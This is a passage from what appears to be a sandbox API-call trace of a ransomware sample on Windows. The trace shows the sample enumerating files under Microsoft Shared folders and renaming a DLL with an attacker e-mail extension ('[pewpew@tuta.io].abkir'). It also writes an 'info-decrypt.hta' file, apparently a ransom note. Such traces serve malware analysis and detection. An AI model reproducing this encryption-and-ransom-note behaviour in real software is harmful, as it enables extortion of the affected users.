ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2ddeaf60, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0195.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0195.468] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0195.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee9c) returned 1 [0195.469] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT", nBufferLength=0x105, lpBuffer=0x6d8e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT", lpFilePart=0x0) returned 0x36 [0195.469] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", nBufferLength=0x105, lpBuffer=0x6d8e978, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", lpFilePart=0x0) returned 0x37 [0195.469] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*", lpFindFileData=0x6d8ebc4 | out: lpFindFileData=0x6d8ebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fcd0 [0195.470] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.470] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x1a9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.CFG", cAlternateFileName="")) returned 1 [0195.470] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda4ec00, ftCreationTime.dwHighDateTime=0x1cba021, ftLastAccessTime.dwLowDateTime=0xc22488c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xfda4ec00, ftLastWriteTime.dwHighDateTime=0x1cba021, nFileSizeHigh=0x0, nFileSizeLow=0x4f160, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.FLT", cAlternateFileName="")) returned 1 [0195.471] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x93f6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.FNT", cAlternateFileName="")) returned 1 [0195.471] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0xadf90, dwReserved0=0x0, dwReserved1=0x0, cFileName="EPSIMP32.FLT", cAlternateFileName="")) returned 1 [0195.471] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeedd0ad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x4e380, dwReserved0=0x0, dwReserved1=0x0, cFileName="GIFIMP32.FLT", cAlternateFileName="")) returned 1 [0195.471] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x3ad80, dwReserved0=0x0, dwReserved1=0x0, cFileName="JPEGIM32.FLT", cAlternateFileName="")) returned 1 [0195.471] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x774, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.CGM", cAlternateFileName="")) returned 1 [0195.471] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x3adb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.EPS", cAlternateFileName="")) returned 1 [0195.471] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x42d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.GIF", cAlternateFileName="")) returned 1 [0195.471] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x425, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.JPG", cAlternateFileName="")) returned 1 [0195.472] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x692, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.PNG", cAlternateFileName="")) returned 1 [0195.472] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.WPG", cAlternateFileName="")) returned 1 [0195.472] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x11d78, dwReserved0=0x0, dwReserved1=0x0, cFileName="PICTIM32.FLT", cAlternateFileName="")) returned 1 [0195.472] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x49f80, dwReserved0=0x0, dwReserved1=0x0, cFileName="PNG32.FLT", cAlternateFileName="")) returned 1 [0195.472] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd53d4900, ftCreationTime.dwHighDateTime=0x1cb7002, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd53d4900, ftLastWriteTime.dwHighDateTime=0x1cb7002, nFileSizeHigh=0x0, nFileSizeLow=0x44780, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPGIMP32.FLT", cAlternateFileName="")) returned 1 [0195.472] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0195.472] FindClose (in: hFindFile=0xb7fcd0 | out: hFindFile=0xb7fcd0) returned 1 [0195.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee5c) returned 1 [0195.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee68) returned 1 [0195.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee9c) returned 1 [0195.473] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT", nBufferLength=0x105, lpBuffer=0x6d8e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT", lpFilePart=0x0) returned 0x36 [0195.473] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", nBufferLength=0x105, lpBuffer=0x6d8e978, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", lpFilePart=0x0) returned 0x37 [0195.473] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*", lpFindFileData=0x6d8ebc4 | out: lpFindFileData=0x6d8ebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fcd0 [0195.474] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.474] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x1a9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.CFG", cAlternateFileName="")) returned 1 [0195.475] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda4ec00, ftCreationTime.dwHighDateTime=0x1cba021, ftLastAccessTime.dwLowDateTime=0xc22488c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xfda4ec00, ftLastWriteTime.dwHighDateTime=0x1cba021, nFileSizeHigh=0x0, nFileSizeLow=0x4f160, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.FLT", cAlternateFileName="")) returned 1 [0195.475] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x93f6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.FNT", cAlternateFileName="")) returned 1 [0195.475] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0xadf90, dwReserved0=0x0, dwReserved1=0x0, cFileName="EPSIMP32.FLT", cAlternateFileName="")) returned 1 [0195.475] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeedd0ad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x4e380, dwReserved0=0x0, dwReserved1=0x0, cFileName="GIFIMP32.FLT", cAlternateFileName="")) returned 1 [0195.475] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x3ad80, dwReserved0=0x0, dwReserved1=0x0, cFileName="JPEGIM32.FLT", cAlternateFileName="")) returned 1 [0195.475] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x774, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.CGM", cAlternateFileName="")) returned 1 [0195.475] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x3adb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.EPS", cAlternateFileName="")) returned 1 [0195.476] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x42d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.GIF", cAlternateFileName="")) returned 1 [0195.476] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x425, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.JPG", cAlternateFileName="")) returned 1 [0195.476] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x692, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.PNG", cAlternateFileName="")) returned 1 [0195.476] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.WPG", cAlternateFileName="")) returned 1 [0195.476] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x11d78, dwReserved0=0x0, dwReserved1=0x0, cFileName="PICTIM32.FLT", cAlternateFileName="")) returned 1 [0195.476] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x49f80, dwReserved0=0x0, dwReserved1=0x0, cFileName="PNG32.FLT", cAlternateFileName="")) returned 1 [0195.477] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd53d4900, ftCreationTime.dwHighDateTime=0x1cb7002, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd53d4900, ftLastWriteTime.dwHighDateTime=0x1cb7002, nFileSizeHigh=0x0, nFileSizeLow=0x44780, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPGIMP32.FLT", cAlternateFileName="")) returned 1 [0195.477] FindNextFileW (in: hFindFile=0xb7fcd0, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd53d4900, ftCreationTime.dwHighDateTime=0x1cb7002, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd53d4900, ftLastWriteTime.dwHighDateTime=0x1cb7002, nFileSizeHigh=0x0, nFileSizeLow=0x44780, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPGIMP32.FLT", cAlternateFileName="")) returned 0 [0195.477] FindClose (in: hFindFile=0xb7fcd0 | out: hFindFile=0xb7fcd0) returned 1 [0195.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee5c) returned 1 [0195.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee68) returned 1 [0195.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", lpFilePart=0x0) returned 0x43 [0195.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\info-decrypt.hta", lpFilePart=0x0) returned 0x47 [0195.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0195.478] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0195.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0195.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", lpFilePart=0x0) returned 0x43 [0195.478] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e7b8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\info-decrypt.hta", lpFilePart=0x0) returned 0x47 [0195.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecac) returned 1 [0195.478] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0 [0195.479] GetFileType (hFile=0x2f0) returned 0x1 [0195.479] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eca8) returned 1 [0195.479] GetFileType (hFile=0x2f0) returned 0x1 [0195.479] WriteFile (in: hFile=0x2f0, lpBuffer=0x3b6d170*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6d8ed70, lpOverlapped=0x0 | out: lpBuffer=0x3b6d170*, lpNumberOfBytesWritten=0x6d8ed70*=0x1000, lpOverlapped=0x0) returned 1 [0195.480] WriteFile (in: hFile=0x2f0, lpBuffer=0x3b6d170*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6d8ed44, lpOverlapped=0x0 | out: lpBuffer=0x3b6d170*, lpNumberOfBytesWritten=0x6d8ed44*=0x55e, lpOverlapped=0x0) returned 1 [0195.480] CloseHandle (hObject=0x2f0) returned 1 [0195.481] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft 